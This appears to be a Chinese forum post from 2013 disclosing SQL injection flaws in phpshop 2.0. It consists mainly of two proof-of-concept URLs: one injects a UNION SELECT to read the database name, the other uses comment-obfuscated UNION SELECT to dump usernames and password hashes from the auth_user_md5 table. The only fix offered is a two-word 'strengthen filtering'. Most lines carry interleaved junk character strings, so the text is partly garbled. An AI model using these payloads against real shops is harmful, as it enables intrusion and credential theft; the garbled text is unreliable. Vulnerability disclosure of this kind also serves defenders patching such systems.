标题 : phpshop 2.0 SQL Injection Vulnerability' H; m: v+ X) O
- c6 x3 B( e9 i+ a7 W0 l6 ^
作者 : By onestree
/ |" i7 }/ J6 v9 u下载地址 : http://code.google.com/p/phpshop/downloads/list
' w1 `5 d1 d6 j测试地址: windows 7 / ubuntu
' s7 L% n# F8 }2 t3 o " m1 Y1 s I1 w. {8 r
9 l0 \* d% n6 o' d' D8 g" v/ m
SQLi p0c:* U% y" d: \# |- G2 W! w$ \
! s+ P1 X3 @6 C: Y
==================
/ `* y6 U- P S0 B4 V& R ! x7 b4 N; ~- l# l/ \' q
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
, N- Z' c: t) G: S) J% ]5 R) L! aunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 N4 M! h2 Q9 f7 N4 T6 J/ I . R* y0 ?0 J5 P7 h
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
+ f2 w- p& C- V( u& o' M
# R0 _! B$ @$ m! ?# v2 m修复:
d' @" O% o6 A: h加强过滤
, R, I+ A8 {! t* M& f
2 M9 r$ S K* N4 {$ M( q/ w
5 K) i5 D1 v; X$ v9 h% p |
发表于 2013-1-18 18:24:10
收藏
支持
反对